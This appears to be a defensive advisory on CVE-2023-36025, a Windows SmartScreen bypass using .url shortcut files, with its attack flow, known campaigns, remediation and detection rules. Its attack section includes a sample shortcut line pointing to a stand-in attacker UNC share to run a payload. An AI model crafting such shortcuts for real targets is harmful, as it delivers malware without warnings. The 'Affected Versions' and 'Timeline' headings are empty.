CVE-2023-36025: Windows SmartScreen — Security Feature Bypass

Background

Windows SmartScreen is a security feature that warns users when they try to open files downloaded from the internet that aren’t signed by a trusted publisher or haven’t been seen by many users. It’s part of the Mark of the Web (MotW) mechanism — when Windows downloads a file, it tags it with an ADS (Alternate Data Stream) attribute indicating where it came from. SmartScreen checks for this tag before executing files.

SmartScreen bypasses are a recurring theme in Windows exploitation. CVE-2023-36025 was patched in November 2023 and was a zero-day at the time — it was being used in active campaigns before Microsoft had a fix. Unlike some SmartScreen bypasses that require complex setups, this one exploits .url shortcut files, which Windows users encounter regularly.

Technical Mechanism

Internet Shortcut files (.url) are Windows shortcuts that open URLs when double-clicked. When a .url file is downloaded from the internet, it should receive a MotW tag and SmartScreen should warn the user before it executes.

CVE-2023-36025 exploits a flaw in how Windows handles .url files that contain a URL= pointing to a network share (UNC path) or specific URL patterns. By crafting a .url file that references a network share path (e.g., URL=\\attacker-ip\share\malware.exe), the SmartScreen check is bypassed — Windows doesn’t apply the MotW warning for these shortcut types even when the shortcut file itself was downloaded from the internet.

The attack flow:

1. Attacker crafts a malicious .url file with URL=\\attacker-ip\share\payload.exe or similar
2. File is delivered to target via phishing email or malicious download
3. Target double-clicks the .url file
4. SmartScreen check is bypassed — no warning shown
5. The referenced payload is executed immediately

The bypass is particularly effective because .url files look innocuous (they appear as internet shortcuts with familiar icons), and users are conditioned to expect website URLs, not to recognise malicious UNC paths.

Real-World Exploitation Evidence

Phemedrone Stealer and similar malware families were distributed using CVE-2023-36025 in active campaigns:

• Phemedrone Stealer — an information stealer that harvests passwords, browser data, cryptocurrency wallets, and system information; distributed via .url files exploiting this bypass
• DarkGate malware — observed using SmartScreen bypass techniques including CVE-2023-36025 in distribution campaigns
• Various phishing campaigns — multiple threat actors adopted the bypass for malware delivery shortly after it became public knowledge

Microsoft assessed this as having been exploited before the patch was released, qualifying it as a zero-day.

Impact Assessment

• Malware execution without user warning — defeats a key user-facing security layer
• Credential theft — Phemedrone and similar stealers harvest all stored credentials, browser history, and sensitive files
• Cryptocurrency wallet compromise — stealers specifically target crypto wallets
• Initial access for ransomware — information stolen via stealers is used to enable follow-on ransomware attacks
• Widespread reach — the effectiveness depends on user click-through, but given how often phishing succeeds, this is a meaningful amplifier
• Bypasses corporate controls — organisations that rely on SmartScreen as a security control have that control circumvented

Affected Versions

Remediation Steps

1. Apply November 2023 Patch Tuesday updates (or later cumulative updates)
2. Verify patch status on all endpoints:

   Get-HotFix | Where-Object {$_.HotFixID -eq "KB5032189"}

3. Consider Group Policy to restrict execution of .url files from untrusted sources
4. Configure email security to quarantine .url file attachments — these are rarely needed in business email
5. Enable enhanced SmartScreen policies via Group Policy:
   • Computer Configuration > Administrative Templates > Windows Components > File Explorer > Configure Windows SmartScreen
6. Deploy endpoint detection tools that can flag .url files containing UNC paths in email attachments or downloads
7. User awareness training — train users to be suspicious of .url shortcut files in emails

Detection Guidance

Endpoint monitoring — look for:

• .url files downloaded from the internet (browser download events)
• Execution of processes spawned from .url shortcut handler (rundll32.exe, ieframe.dll)
• Network connections to UNC paths immediately after a .url file is opened

Email security gateway — block or quarantine .url file attachments; very few legitimate business use cases require sending these.

SIEM detection:

process_name = "rundll32.exe" AND command_line CONTAINS "ieframe.dll,OpenURL" AND parent = "explorer.exe"

Suricata signature:

alert smb any any -> $HOME_NET any (msg:"Possible CVE-2023-36025 SmartScreen Bypass UNC Request"; flow:established,to_server; content:"|ff|SMB"; offset:4; depth:4; classtype:policy-violation; sid:2034015; rev:1;)

Timeline